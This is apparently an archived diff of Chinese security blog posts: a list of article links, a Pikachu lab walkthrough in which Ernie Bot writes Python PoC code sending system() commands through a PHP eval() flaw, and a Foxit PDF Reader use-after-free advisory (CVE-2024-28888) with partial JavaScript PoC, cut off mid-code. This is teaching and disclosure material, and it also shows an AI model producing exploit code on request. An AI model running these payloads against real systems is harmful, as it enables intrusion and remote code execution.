[数据安全知识:数据整理与数据清理](http://mp.weixin.qq.com/s?__biz=MzA5MzU5MzQzMA==&mid=2652105810&idx=2&sn=97ff4a8d1f2c7f3f6a0252f4df58b20b&chksm=8bbcc66bbccb4f7d058c46bc9c67d34c2042993f2ad32c7732d9816f8dfa4abb7e10f0fd307f&scene=21#wechat_redirect)
[数据安全知识:什么是数据安全态势管理?](http://mp.weixin.qq.com/s?__biz=MzA5MzU5MzQzMA==&mid=2652105525&idx=1&sn=8625752fb73b4da258b7df177ff8709d&chksm=8bbcc10cbccb481a1b0a68f1061dd2fdda08d2e58974c0fb3fd2c90c9fa77e0641ab814399b2&scene=21#wechat_redirect)
[数据安全知识:数据库安全重要性](http://mp.weixin.qq.com/s?__biz=MzA5MzU5MzQzMA==&mid=2652104183&idx=2&sn=f2a98256b0497ce3a99c0ad30223bf40&chksm=8bbccfcebccb46d8aac9f8a5c8d1f46061ca61ad69b3a61d52d3dc614e1e18ae65d982a5574b&scene=21#wechat_redirect)
[数据安全知识:数据库安全威胁](http://mp.weixin.qq.com/s?__biz=MzA5MzU5MzQzMA==&mid=2652103736&idx=2&sn=6d70e9d5690b4e3748460d641e14fce8&chksm=8bbcce01bccb47177fce9597fb30e8a27e00a9683e6afbcfb2ea7128a424504ff24af8aa54cc&scene=21#wechat_redirect)
[数据安全知识:不同类型的数据库](http://mp.weixin.qq.com/s?__biz=MzA5MzU5MzQzMA==&mid=2652103688&idx=1&sn=9377838e11b62f5d73aa1dbda22ec178&chksm=8bbcce31bccb4727c19ada8cdf5d571227e363447987209eb77f4f07e240b1cd263c2de8a547&scene=21#wechat_redirect)
[数据安全知识:数据库简史](http://mp.weixin.qq.com/s?__biz=MzA5MzU5MzQzMA==&mid=2652103686&idx=1&sn=abcfc1080a7641d41607cca4dc0fab1d&chksm=8bbcce3fbccb4729926a8249ec3bb0344a59268b7af49a68100c03839ace2c6ea59228e68c75&scene=21#wechat_redirect)
[数据安全知识:什么是数据出口?](http://mp.weixin.qq.com/s?__biz=MzA5MzU5MzQzMA==&mid=2652103679&idx=1&sn=f23569ddbc6e5b5b39b307401a53a7f4&chksm=8bbcc9c6bccb40d06ee30f3e73257c08ff61d5aff33040f9a08513473a1f9619f285a531ef42&scene=21#wechat_redirect)
[数据安全知识:什么是数据治理模型?](http://mp.weixin.qq.com/s?__biz=MzA5MzU5MzQzMA==&mid=2652103450&idx=1&sn=ce981cd32e6966e5bfd08e0e85ac6528&chksm=8bbcc923bccb4035b5bd145b2941e0f096cb26f0448a3c5f7fd1bf0652507f2470a33ea26fde&scene=21#wechat_redirect)
[](http://mp.weixin.qq.com/s?__biz=MzA5MzU5MzQzMA==&mid=2652104021&idx=1&sn=7f80bb27ce6ad7c9debe83c172ff9f73&chksm=8bbccf6cbccb467a0971b9de4a8b14851c2666ad6934a88b8324a1ffc4b5cf5109cbc3976697&scene=21#wechat_redirect)
******>>>错与罚<<<**
[警惕风险突出的100个高危漏洞](http://mp.weixin.qq.com/s?__biz=MzA5MzU5MzQzMA==&mid=2652110660&idx=2&sn=f73b70334bbbfd41e947196421c0e48e&chksm=8bbcd57dbccb5c6b8b4e1d2fb983c38b5d8b5b4eac9fa5d962a394986b52c236ffd52e98900c&scene=21#wechat_redirect)
[警惕风险突出的100个高危漏洞](http://mp.weixin.qq.com/s?__biz=MzA5MzU5MzQzMA==&mid=2652110692&idx=1&sn=07a2e458a81bf5e171c012ec2d390747&chksm=8bbcd55dbccb5c4bb497a3f138646541862342730a91e07cd87ee057ed895463fc79889d7f9a&scene=21#wechat_redirect)
[警惕“两高一弱”风险及安全防护提示(全集)](http://mp.weixin.qq.com/s?__biz=MzA5MzU5MzQzMA==&mid=2652110867&idx=2&sn=6f1237fc1d4b4a96274a7ac32d30dd48&chksm=8bbb2a2abccca33c14387b6dab727657d29828f1d345e5a5ed6916c551c79caa46227b70e98f&scene=21#wechat_redirect)
[不履行网络安全保护义务是违法行为!多家单位被通报!](http://mp.weixin.qq.com/s?__biz=MzA5MzU5MzQzMA==&mid=2652110660&idx=3&sn=d76fcf3f3b2460f12788131b24bd07bb&chksm=8bbcd57dbccb5c6b54706e7a7b969bec42b8f938b5e3288c4f66181a6761ec2b2a2c6e762258&scene=21#wechat_redirect)
[因侵犯公民个人信息罪 深圳一人被判一年三个月 售卖他人求职简历](http://mp.weixin.qq.com/s?__biz=MzA5MzU5MzQzMA==&mid=2652110562&idx=2&sn=c6a1c5f1a8ca72cee2275e12c04e3da7&chksm=8bbcd4dbbccb5dcde3df4fcf8c145d2ea32ed8cc9661e41cfc3e81b30c2b4bc9044290932a2f&scene=21#wechat_redirect)
[公安部网安局:河南开展整治网络谣言专项行动 查处造谣传谣3000余人](http://mp.weixin.qq.com/s?__biz=MzA5MzU5MzQzMA==&mid=2652110555&idx=1&sn=5ed0b638c02610d74ea55c6ea395fa6d&chksm=8bbcd4e2bccb5df45946baa11ef66ff7fa78857a8860732bc1648d3f724cd94b1b375db31455&scene=21#wechat_redirect)
[四川遂宁公安公布10起涉网违法犯罪典型案例](http://mp.weixin.qq.com/s?__biz=MzA5MzU5MzQzMA==&mid=2652110543&idx=1&sn=82fb911e67140dc4c3bc2f718b51b2f2&chksm=8bbcd4f6bccb5de02ac699120a6846b52769fc3b556d5c714989155da6b0112602f945efdca9&scene=21#wechat_redirect)
[276人落网河南新乡警方摧毁特大“网络水军”犯罪团伙](http://mp.weixin.qq.com/s?__biz=MzA5MzU5MzQzMA==&mid=2652107934&idx=1&sn=3fdd7afb3d6a3f78a89264fee3d0b20f&chksm=8bbcdea7bccb57b19ec50b56f4d52ea88256f018bdaf52e71b0bb69c04b43b657068fc8873d3&scene=21#wechat_redirect)
[重拳出击严打涉网犯罪 海淀警方守护网络清朗](http://mp.weixin.qq.com/s?__biz=MzA5MzU5MzQzMA==&mid=2652108593&idx=1&sn=8e93b447968d40bf565560c46745345c&chksm=8bbcdd08bccb541e2f8b10b6b48906b74b32ac105ed15d32e2b09bd9a817a62669089a4b6eee&scene=21#wechat_redirect)
[网警@同学们 暑期这些兼职不能做!](http://mp.weixin.qq.com/s?__biz=MzA5MzU5MzQzMA==&mid=2652108584&idx=1&sn=27619dc24ce7fb3ea7d6c3f6583c8985&chksm=8bbcdd11bccb5407929b19d23b46d46660f67a3aa3403573c4f719b853bf5cac1bea3d874a76&scene=21#wechat_redirect)
[非法出售公民个人信息 网站经营者被判三年有期徒刑](http://mp.weixin.qq.com/s?__biz=MzA5MzU5MzQzMA==&mid=2652108478&idx=1&sn=7141f5a94125cd7197f42ad9ec90d049&chksm=8bbcdc87bccb5591b67768e99a087cf7ed7dcf649de05aae58f07145ad1f1ebb10b19811fa4a&scene=21#wechat_redirect)
[超范围采集公民信息,违法!鹤壁网警出手](http://mp.weixin.qq.com/s?__biz=MzA5MzU5MzQzMA==&mid=2652108457&idx=1&sn=63410ada1542c292aef408d9f19a406e&chksm=8bbcdc90bccb558613ccf77045115cadee03018421cc7d27e0c4d3539fc0e417f0bf127b0ffb&scene=21#wechat_redirect)
[一公司高管为泄愤攻击智慧停车收费系统,致上千家停车场无法自动抬杆](http://mp.weixin.qq.com/s?__biz=MzA5MzU5MzQzMA==&mid=2652108431&idx=1&sn=e956b5e0330d1ac42c0970a8221cbd2d&chksm=8bbcdcb6bccb55a02ad83b6f9d4e0982a66aa2c68f190784d4872d96ca575491f8b6cbb395c2&scene=21#wechat_redirect)
[重庆某国企因网安责任人履职不到位被约谈](http://mp.weixin.qq.com/s?__biz=MzA5MzU5MzQzMA==&mid=2652108391&idx=2&sn=3b7ecd3285d400cb121a1c2b4a315f77&chksm=8bbcdc5ebccb554840f9a3a4c1cf6aaa0232f99264fc985c73680c3eba4ac9620c172430c96d&scene=21#wechat_redirect)
[因违规收集使用个人信息等人保寿险宁波分公司被罚32万4名责任人同时被罚](http://mp.weixin.qq.com/s?__biz=MzA5MzU5MzQzMA==&mid=2652108384&idx=1&sn=b4d530f625ded16386039925ec895b93&chksm=8bbcdc59bccb554fb14966a1dbb45cadd2bea2262ef55d24fd8b3e9e5823d62f85cf9a665ebd&scene=21#wechat_redirect)
[回顾长沙市三个区网信开出首张罚单的不同时间和处罚单位类型](http://mp.weixin.qq.com/s?__biz=MzA5MzU5MzQzMA==&mid=2652108218&idx=1&sn=bb9a9d86f84190165657fe632a20a6fd&chksm=8bbcdf83bccb56957221b54507e3e3d2c5175c3c03e446c1b6f21ea0f5996d63e9823c40bea1&scene=21#wechat_redirect)
[上海4人被判刑5元掌握明星偶像行程贩卖明星信息4人被判刑](http://mp.weixin.qq.com/s?__biz=MzA5MzU5MzQzMA==&mid=2652107594&idx=1&sn=ee06d83cfaa8707d854bc55f40390712&chksm=8bbcd973bccb50656351a887d05ff7fe1903fe9b047c326c234ecb35b30ca16fe9bc9de18fb3&scene=21#wechat_redirect)
[假期内,网络主播直播约架?郑州警方迅速控制,刑拘十人!网络空间不是法外之地!](http://mp.weixin.qq.com/s?__biz=MzA5MzU5MzQzMA==&mid=2652107500&idx=1&sn=e7164b1ec2e7b3c81ef786c8062ea90d&chksm=8bbcd8d5bccb51c37b36fb9dae5edc4cb7eb7f37c0676aed9e03349369fe14db5b5414603066&scene=21#wechat_redirect)
****
[网安局:拒不履行网络安全保护义务,处罚!事关备案!](http://mp.weixin.qq.com/s?__biz=MzA5MzU5MzQzMA==&mid=2652107522&idx=1&sn=4843f7b72a7a7b1da458c4f240947dc2&chksm=8bbcd93bbccb502d8bc6a2291e7c5a08798ae79d5cae3037de990332dfe0f9243add5e39e32b&scene=21#wechat_redirect)
[网络水军团灭记:“转评赞”狂刷单 上百人“网络水军”团伙落网](http://mp.weixin.qq.com/s?__biz=MzA5MzU5MzQzMA==&mid=2652107516&idx=1&sn=117d1be3f2c7b4057e6a60d0ab48f29d&chksm=8bbcd8c5bccb51d3aad4a7cf41cbd73e2c6fb01a152de00603cfbeb5ce7aa31ca62c95653cbc&scene=21#wechat_redirect)
[北京多家公司因不履行网络安全保护义务被处罚!“两高一弱”仍然是安全隐患重点](http://mp.weixin.qq.com/s?__biz=MzA5MzU5MzQzMA==&mid=2652104010&idx=1&sn=0ddfdc41a52d235c99269b784b7858fa&chksm=8bbccf73bccb4665d0c29f8067b90e0e9b48894d2d4bbb9da98e64218efa47e36c32034a4775&scene=21#wechat_redirect)
[关于“近20台服务器“沦陷”3.54亿条个人信息被盗”一点点浅析](http://mp.weixin.qq.com/s?__biz=MzA5MzU5MzQzMA==&mid=2652107485&idx=1&sn=b921658e6fc54b0e03c424060bb195c2&chksm=8bbcd8e4bccb51f23d9e791898e7242435c9eb86a9466eb14696154f453e909df4ca99058048&scene=21#wechat_redirect)
**>>>其他<<<**
[2023年10佳免费网络威胁情报来源和工具](http://mp.weixin.qq.com/s?__biz=MzA5MzU5MzQzMA==&mid=2652103402&idx=1&sn=80a1ee98453d96a6f2304272d2a6b33e&chksm=8bbcc8d3bccb41c5fe204b9933fbded47cd14612e3101111b2f806d8a136a61ff27577dfd765&scene=21#wechat_redirect)
[重大网络安全事件事后工作很重要](http://mp.weixin.qq.com/s?__biz=MzA5MzU5MzQzMA==&mid=2652109243&idx=1&sn=66ebd9e0cd7aaed3967e7892e97411ec&chksm=8bbcd382bccb5a94ea5827868c3b4f53720df5924228b6d7e86bdb3846af2005a791c988dc57&scene=21#wechat_redirect)
[默认安全:对现代企业意味着什么](http://mp.weixin.qq.com/s?__biz=MzA5MzU5MzQzMA==&mid=2652109171&idx=2&sn=ccd124eea257169076752301ad771bfc&chksm=8bbcd34abccb5a5c65ecc8e34939a28c986df836538b42a371a98ab4bb86ffaf6745a614cd30&scene=21#wechat_redirect)
[网络安全知识:什么是事件响应?](http://mp.weixin.qq.com/s?__biz=MzA5MzU5MzQzMA==&mid=2652109115&idx=1&sn=af5883cf9e70ccedd3b149ec88083f63&chksm=8bbcd302bccb5a14c517e489c94f479fe506653555319e7afb7ac497f1b18f931fc112acca05&scene=21#wechat_redirect)
[网络安全知识:什么是攻击面?](http://mp.weixin.qq.com/s?__biz=MzA5MzU5MzQzMA==&mid=2652109689&idx=1&sn=61962a0441d69a6a45bafa0858c73ac3&chksm=8bbcd140bccb5856dcc218be44459f8ec2bb83155b9245135aa2e0660d04f26bf64a2032334d&scene=21#wechat_redirect)
[网络安全知识:什么是访问控制列表 (ACL)](http://mp.weixin.qq.com/s?__biz=MzA5MzU5MzQzMA==&mid=2652109981&idx=1&sn=3b95eb9a12e7cd3a9db4a8fb90c3f298&chksm=8bbcd6a4bccb5fb2d18a5315364285c9368181762a07181abbdc87be85e92274d405c6b8148a&scene=21#wechat_redirect)
[网络安全知识:什么是访问管理?](http://mp.weixin.qq.com/s?__biz=MzA5MzU5MzQzMA==&mid=2652110001&idx=1&sn=e18dd441809b6634de4821a0d619e898&chksm=8bbcd688bccb5f9ea001b8fb253e92f929ec2b1441f7a9d86e1bb8a6a0cbf3010d97c4d41116&scene=21#wechat_redirect)
网络安全知识:什么是访问矩阵?
网络安全知识:什么是账户收集?
网络安全知识:什么是工业控制系统 (ICS) 网络安全?
网络安全知识:什么是暴力攻击?
网络安全知识:什么是安全审计?
网络安全知识:什么是分组密码?
[网络安全知识:什么是僵尸网络?](http://mp.weixin.qq.com/s?__biz=MzA5MzU5MzQzMA==&mid=2652110814&idx=1&sn=8b8643f27090517cd38b7bdfca106b64&chksm=8bbcd5e7bccb5cf1de02c7a139dcf27e3772926c33a2c799f50f34bc283334265f6d1a55d314&scene=21#wechat_redirect)
[网络安全知识:什么是非对称加密?](http://mp.weixin.qq.com/s?__biz=MzA5MzU5MzQzMA==&mid=2652110867&idx=1&sn=20f07912999089d4b0133c7a1e5cec82&chksm=8bbb2a2abccca33ce3f700baf9cd4c96168180228810626a777017d55479809aad038e0e2f55&scene=21#wechat_redirect)
[网络安全知识:什么是边界网关协议 (BGP)](http://mp.weixin.qq.com/s?__biz=MzA5MzU5MzQzMA==&mid=2652110952&idx=1&sn=ac6937a832634777a5c0480e7b847e5c&chksm=8bbb2a51bccca347a51a6e3ae6b002b162026c6d3cceb89be97ffc4d7abf9cb1175be02c72ab&scene=21#wechat_redirect)
[网络安全知识:什么是缓冲区溢出?](http://mp.weixin.qq.com/s?__biz=MzA5MzU5MzQzMA==&mid=2652110978&idx=2&sn=864c593d89fd0c500cabf040fc6d254e&chksm=8bbb2abbbccca3adcb1bf265e874de8fe2f622998c81a423e744d94ba5fc5efc46d4299707a2&scene=21#wechat_redirect)
[网络安全知识网络安全中的EDR是什么](http://mp.weixin.qq.com/s?__biz=MzA5MzU5MzQzMA==&mid=2652111008&idx=2&sn=e68f898907e90b7d12e4d6c89dd053f2&chksm=8bbb2a99bccca38f6ebc8b3e3df8ee219a839137a47c4d9321357aa7924c539eff63a681a932&scene=21#wechat_redirect)
[网络安全知识:什么是身份验证?](http://mp.weixin.qq.com/s?__biz=MzA5MzU5MzQzMA==&mid=2652111116&idx=1&sn=f18dfbd3df26e039176ca2a89538cc99&chksm=8bbb2b35bccca223a87356ec689522b735b67f210d0909afc7ad0947123e7a28fa81c292b517&scene=21#wechat_redirect)
[网络安全知识:什么是勒索软件?](http://mp.weixin.qq.com/s?__biz=MzA5MzU5MzQzMA==&mid=2652111162&idx=1&sn=2bb5e90d61e923c6f8bda9daaf2f4e22&chksm=8bbb2b03bccca2157560e7f883da20ec97ea1f28f4acac53d2e1f3cb70fca6a6bb635c5f9b28&scene=21#wechat_redirect)
[网络安全知识:什么是授权?](http://mp.weixin.qq.com/s?__biz=MzA5MzU5MzQzMA==&mid=2652111403&idx=1&sn=dfc2ab6b8f3b16c1b396f4e9ecd46d32&chksm=8bbb2812bccca104d3a5e98cfda7df39998f99aa684e8e1d19f0ff3b1ccbd2c5fefa1f631d0f&scene=21#wechat_redirect)
[网络安全知识:什么是自治系统?](http://mp.weixin.qq.com/s?__biz=MzA5MzU5MzQzMA==&mid=2652111408&idx=1&sn=64fd103eabd6f3385cbd7d1f5753e1ba&chksm=8bbb2809bccca11f0912cdabfc8cdbaa9e088e3fff648bdc784020ebc60fb113f4a3854ce528&scene=21#wechat_redirect)
[网络安全知识:什么是蓝队?](http://mp.weixin.qq.com/s?__biz=MzA5MzU5MzQzMA==&mid=2652111435&idx=1&sn=76a6e146976c771efbd33d18711aeaed&chksm=8bbb2872bccca16471c5a11ef0ed85b961ea13f79840e6480868f5a2e07bd92f0b5b730c9858&scene=21#wechat_redirect)
[网络安全知识什么是Bind Shell](http://mp.weixin.qq.com/s?__biz=MzA5MzU5MzQzMA==&mid=2652111434&idx=1&sn=6abb4da55ace854504634b91c5d03d0d&chksm=8bbb2873bccca1658009cced3c8eb6e33d8fe70b92b21c909d19e165f34984370ce685464795&scene=21#wechat_redirect)
[网络安全知识:什么是安全网关?](http://mp.weixin.qq.com/s?__biz=MzA5MzU5MzQzMA==&mid=2652111461&idx=1&sn=49f35ce8e8c4a514021230d6ff71df63&chksm=8bbb285cbccca14a366dfa79b28eade1946697ad6e21d56c4779326d5c64bf3b19e8da17c334&scene=21#wechat_redirect)
[网络安全知识:什么是蓝队?](http://mp.weixin.qq.com/s?__biz=MzA5MzU5MzQzMA==&mid=2652111467&idx=1&sn=535dc711614409556111ae5f8b934fb1&chksm=8bbb2852bccca144b52292ba3a6db4c0d1bc30e994e44436b32646ad30155e32b093bc8896a4&scene=21#wechat_redirect)
[网络安全知识:什么是防病毒产品?](http://mp.weixin.qq.com/s?__biz=MzA5MzU5MzQzMA==&mid=2652111499&idx=1&sn=af21f8e561e6dcb9054731c9f6eeeb44&chksm=8bbb28b2bccca1a48d49ba0274f13bce414011c0d5c5b0343e4fcd44a6b8084c360497b3196f&scene=21#wechat_redirect)
[网络安全知识:什么是横幅抓取?](http://mp.weixin.qq.com/s?__biz=MzA5MzU5MzQzMA==&mid=2652111530&idx=1&sn=b96c0cb4c526efa421140f1969054370&chksm=8bbb2893bccca185b9d74221dda8928675234c7dca7a7509ada71f75d12725c09f24556f8ce5&scene=21#wechat_redirect)
[网络安全知识:什么是堡垒主机?](http://mp.weixin.qq.com/s?__biz=MzA5MzU5MzQzMA==&mid=2652111569&idx=1&sn=682b9fd72de2345add63f32cb03a9594&chksm=8bbb28e8bccca1fed6e96e303693f15d2fca5af53104c4501266138326ea8dcd814d567dc383&scene=21#wechat_redirect)
[网络安全知识:什么是引导扇区病毒?](http://mp.weixin.qq.com/s?__biz=MzA5MzU5MzQzMA==&mid=2652111623&idx=1&sn=d08c3a5d6a56d19ab09efc23f931f591&chksm=8bbb293ebccca0281f91f4b4841fd0322ccf054b00884bf4d5e781ad7b87af2e748663447bb3&scene=21#wechat_redirect)
[网络安全知识:计算机网络中的桥接器](http://mp.weixin.qq.com/s?__biz=MzA5MzU5MzQzMA==&mid=2652111663&idx=1&sn=988871cc851be902d4a522742f3aa74f&chksm=8bbb2916bccca00079ad347eb1edb3b05e89f992029a0578d2bee3f35d7f57ded335938a998d&scene=21#wechat_redirect)
[网络安全知识:什么是广播?](http://mp.weixin.qq.com/s?__biz=MzA5MzU5MzQzMA==&mid=2652111804&idx=1&sn=bfebf50ec42eb80bb514fcd58b4118f7&chksm=8bbb2985bccca093779606eda8be3e7d8612cff4875b2d53b1bba8c7b824b8026cdc1a94c3b3&scene=21#wechat_redirect)
[网络安全知识:什么是业务连续性计划?](http://mp.weixin.qq.com/s?__biz=MzA5MzU5MzQzMA==&mid=2652111861&idx=1&sn=6422e5fff3d9f15538ad1f584c9d64a7&chksm=8bbb29ccbccca0daf5a36e2b9ecfaadbcce7536e764d12c94cb11f603b3dd08d024fe0a31ee4&scene=21#wechat_redirect)
[网络安全知识:什么是基于证书的身份验证?](http://mp.weixin.qq.com/s?__biz=MzA5MzU5MzQzMA==&mid=2652111903&idx=1&sn=4fff383f27b653414bf334d894aff2f2&chksm=8bbb2e26bccca730f90859d9ce0095bf42192f937c3f8614cb703804cc21560ecb39aeb19315&scene=21#wechat_redirect)
[将人类从网络安全中解放出来](http://mp.weixin.qq.com/s?__biz=MzA5MzU5MzQzMA==&mid=2652110078&idx=1&sn=9b6012acb2808e9979623b819070c6e3&chksm=8bbcd6c7bccb5fd1b188fdbcaffeab331d050f1f48a14a5a3d150c1d2933c7f644b0716b4cda&scene=21#wechat_redirect)
[人,是造成网络安全问题的根本原因](http://mp.weixin.qq.com/s?__biz=MzA5MzU5MzQzMA==&mid=2652110057&idx=2&sn=59ec8be4eb16065bba92c423f443e75b&chksm=8bbcd6d0bccb5fc6b550d4baa70646f94e2b2bb5f3d8639a4f8ecca6fdf314c85e32c635f23c&scene=21#wechat_redirect)

View File

@ -0,0 +1,226 @@
# AI代码审计和POC编写
原创 道玄安全 道玄网安驿站 2024-11-16 15:25
**“**
 AI做代码审计和POC编写真好使**”**
![](https://mmbiz.qpic.cn/sz_mmbiz_png/L369x9IF3yPA9bic9zzTydWv4XTTHH2NAiamMp8Kxsh4s2lukPuyuwnia3NiaHkiaU8a3JGFhLvNnYvtLvHTFAd91Rw/640?wx_fmt=png&from=appmsg "")
    
看到了,**关注一下**
不吃亏啊点个赞转发一下啦WP看不下去的可以B站搜**标松君**
UP主录的打靶视频欢迎关注。顺便宣传一下星球**重生者安全,**
里面每天会不定期更新**OSCP**
知识点,**车联网**
**渗透红队**
以及**漏洞挖掘工具**
等信息分享,欢迎加入;以及想挖**SRC逻辑漏洞**
的朋友,可以私聊。
01
AI代码审计初体验
        在看了很多AI模型对代码审计的能力后小编也想来体验一下AI做代码审计和POC编写的尝试所以有了一下小实验
1.实验目标:通过**AI**写出一段**python**编写的**POC**
2.实验工具:**百度文心一言**
3.实验靶机pikachu
02
## 实验过程
    小编选择了pikachu的RCE漏洞漏洞代码如下
```
路径C:\phpstudy_pro\WWW\pikachu\vul\rce\rce_eval.php
if(isset($_POST['submit']) && $_POST['txt'] != null){
if(@!eval($_POST['txt'])){
$html.="<p>你喜欢的字符还挺奇怪的!</p>";
}
}
```
将代码输入文心一言并附上要求:
![](https://mmbiz.qpic.cn/sz_mmbiz_png/L369x9IF3yM8MVMVR9fYxCBbOBo9PCaqWKCg6ibKzIicOtPwSdYnpLI3oby2UiaxyzBmFNIcnrc2RanMwbKSxxY5A/640?wx_fmt=png&from=appmsg "")
下面是AI给出的html版的代码
```
<!DOCTYPE html>
<html>
<head>
<title>POC: Exploit for eval() vulnerability</title>
</head>
<body>
<h1>POC: Exploit for eval() vulnerability</h1>
<form action="http://your-vulnerable-site.com/vulnerable-page.php" method="POST">
<label for="txt">Enter PHP code to execute:</label>
<textarea name="txt" id="txt" rows="10" cols="50"><?php echo phpinfo(); ?></textarea><br><br>
<input type="hidden" name="submit" value="1">
<input type="submit" value="Submit">
</form>
</body>
</html>
```
小编想要的是python版本的就继续要求它
![](https://mmbiz.qpic.cn/sz_mmbiz_png/L369x9IF3yM8MVMVR9fYxCBbOBo9PCaq8Qsludib0jKe5KibI86oRUTe3oHTJ4EjsrBAd8mcu8E2zv6QAK37Lfqw/640?wx_fmt=png&from=appmsg "")
代码如下:
```
import requests
# 目标网站的 URL
url = "http://your-vulnerable-site.com/vulnerable-page.php"
# 要执行的 PHP 代码(作为字符串发送)
malicious_code = "<?php echo 'Vulnerable!'; system('whoami'); ?>"
# 构建 POST 数据
post_data = {
'txt': malicious_code,
'submit': '1' # 假设后端检查这个字段来确定是否处理请求
}
# 发送 POST 请求
response = requests.post(url, data=post_data)
# 输出响应内容
print(response.text)
```
将代码中的URL地址修改一下试一试发现不太行直接用它的payload放进漏洞的输入框发现是失败的
![](https://mmbiz.qpic.cn/sz_mmbiz_png/L369x9IF3yM8MVMVR9fYxCBbOBo9PCaq1YG1T5jLMRjhQ5m3erm3VOmpzjlcQPjfM06yth5YwIVlcmGQQljL5A/640?wx_fmt=png&from=appmsg "")
我们继续要求:
![](https://mmbiz.qpic.cn/sz_mmbiz_png/L369x9IF3yM8MVMVR9fYxCBbOBo9PCaqVNwJjLJkeJRApfUxIYMetVtFSFneUMOlKLb1WTnnmvbecfCtwKUODQ/640?wx_fmt=png&from=appmsg "")
这回它给出的poc是
```
import requests
# 目标URL替换为你的目标URL
target_url = "http://example.com/vulnerable_script.php"
# 构造POST数据
# 尝试执行一个简单的echo语句
post_data = {
'submit': '1', # 确保submit字段存在
'txt': 'echo "Hello from eval!";' # 尝试输出字符串
}
# 发送POST请求
response = requests.post(target_url, data=post_data)
# 打印响应内容
print(response.text)
```
直接把payload放到输入框
可以正常执行了!
![](https://mmbiz.qpic.cn/sz_mmbiz_png/L369x9IF3yM8MVMVR9fYxCBbOBo9PCaqnDYIFfCGhY9u4aib4MLeElbdHqaBv493yO6J2kUDLMibzXxKKXjsGlWA/640?wx_fmt=png&from=appmsg "")
继续给它要求:
```
就照着'txt': 'echo "Hello from eval!";' 的格式写一个system函数的poc
```
![](https://mmbiz.qpic.cn/sz_mmbiz_png/L369x9IF3yM8MVMVR9fYxCBbOBo9PCaqYTu7TOeo5TmiaAJllPsqkUKReJoniaUdVdGdcE1e5IA43zlAIeZyY62Q/640?wx_fmt=png&from=appmsg "")
POC如下
```
import requests
# 目标URL替换为你的目标URL
target_url = "http://example.com/vulnerable_script.php"
# 注意在Windows系统上应使用'dir'而不是'ls'
# 构造POST数据尝试执行system函数列出当前目录内容
# 对于Unix/Linux系统
post_data_unix = {
'submit': '1', # 确保submit字段存在
'txt': 'system("ls -la");' # 尝试执行ls命令列出目录内容
}
# 对于Windows系统
# post_data_windows = {
# 'submit': '1',
# 'txt': 'system("dir");' # 尝试执行dir命令列出目录内容
# }
# 选择适当的POST数据根据你的目标系统
post_data = post_data_unix # 或者 post_data_windows
# 发送POST请求
response = requests.post(target_url, data=post_data)
# 打印响应内容
print(response.text)
```
由于我的是windows部署的靶机所以出现了下面的结果
![](https://mmbiz.qpic.cn/sz_mmbiz_png/L369x9IF3yM8MVMVR9fYxCBbOBo9PCaqLfvylgiciaTb39lFPuDwTuxtSVmEoJSbousyx9tdKdMQFsohOicvd05Ug/640?wx_fmt=png&from=appmsg "")
到现在我已经成功的让AI根据一段代码写出了poc不得不说AI做代码审计是天然的优势
**更多精彩内容请扫码关注“重生者安全”星球**
![](https://mmbiz.qpic.cn/sz_mmbiz_png/L369x9IF3yPA9bic9zzTydWv4XTTHH2NAeuqcZvqTz0LHiadOuGVcHz49J7Wl5mAkug4yC75PbuErvyuib90R9l8g/640?wx_fmt=png&from=appmsg "")
****
免责声明:
### 本人所有文章均为技术分享,均用于防御为目的的记录,所有操作均在实验环境下进行,请勿用于其他用途,否则后果自负。
第二十七条:任何个人和组织不得从事非法侵入他人网络、干扰他人网络正常功能、窃取网络数据等危害网络安全的活动;不得提供专门用于从事侵入网络、干扰网络正常功能及防护措施、窃取网络数据等危害网络安全活动的程序和工具;明知他人从事危害网络安全的活动,不得为其提供技术支持、广告推广、支付结算等帮助
第十二条:  国家保护公民、法人和其他组织依法使用网络的权利,促进网络接入普及,提升网络服务水平,为社会提供安全、便利的网络服务,保障网络信息依法有序自由流动。
任何个人和组织使用网络应当遵守宪法法律,遵守公共秩序,尊重社会公德,不得危害网络安全,不得利用网络从事危害国家安全、荣誉和利益,煽动颠覆国家政权、推翻社会主义制度,煽动分裂国家、破坏国家统一,宣扬恐怖主义、极端主义,宣扬民族仇恨、民族歧视,传播暴力、淫秽色情信息,编造、传播虚假信息扰乱经济秩序和社会秩序,以及侵害他人名誉、隐私、知识产权和其他合法权益等活动。
第十三条:  国家支持研究开发有利于未成年人健康成长的网络产品和服务,依法惩治利用网络从事危害未成年人身心健康的活动,为未成年人提供安全、健康的网络环境。

View File

@ -0,0 +1,196 @@
# CVE-2024-28888福昕阅读器中使用释放后导致远程代码执行
Ots安全 2024-11-16 07:02
![](https://mmbiz.qpic.cn/mmbiz_gif/bL2iaicTYdZn7gtxSFZlfuCW6AdQib8Q1onbR0U2h9icP1eRO6wH0AcyJmqZ7USD0uOYncCYIH7ZEE8IicAOPxyb9IA/640?wx_fmt=gif "")
**网址**
- https://www.talosintelligence.com/vulnerability_reports/TALOS-2024-1967
**目标**
- 福昕PDF编辑器版本2024.X~2024.2.3.25184Windows
- 福昕PDF编辑器版本2023.X~2023.3.0.23028Windows
- 福昕PDF阅读器版本~2024.2.3.25184包含Windows
- 福昕PDF编辑器版本2024.X~2024.2.3.64402(含)(macOS)
- 福昕 PDF 编辑器版本2023.x~ 2023.3.0.63083(含)(macOS)
- 福昕 PDF 阅读器版本:~ 2024.2.2.64388(包含)(macOS)
- 福昕 PDF 编辑器版本13.x包含~ 13.1.2.62201(包含)(macOS)
- 福昕 PDF 编辑器版本12.x包含~ 12.1.5.55449(包含)(macOS)
- Foxit PDF Editor版本~11.1.9.0524包含macOS
- 福昕 PDF 编辑器版本13.X包含~ 13.1.3.22478(包含)(Windows)
- 福昕 PDF 编辑器版本12.X包含~ 12.1.7.15526(包含)(Windows)
- Foxit PDF Editor版本~11.2.10.53951包含Windows
**解释**
Foxit PDF Reader使用V8 JavaScript引擎支持交互式PDF功能。交互式 PDF 是包含可点击链接、按钮、表单字段、音频、视频和其他元素的 PDF 文件。
Foxit PDF Reader在管理复选框对象时存在释放后使用漏洞。在下面的PoC代码中delete_pages()回调函数在addField()执行第二个函数时被触发。deletePages()当复选框对象被释放然后在未经验证的情况下重新使用时,就会出现释放后使用漏洞。
```
function main() {
 var aa = app.activeDocs[0].addField("ADD", "checkbox", 2, [17,0,5,14] ).defaultIsChecked(0);
 getField("txt3").setAction("Calculate",'delete_pages();');
 app.activeDocs[0].addField("ADD", "checkbox", 0, [17,0,5,14] ) ;
 
 // 이후 checkbox object가 재사용될 때 use-after-free 취약점 발생함
 // 재사용하는 부분 PoC 코드 정확하게 공개되지 않음
}
function delete_pages(arg1, arg2, arg3) {
  app.activeDocs[0].deletePages();
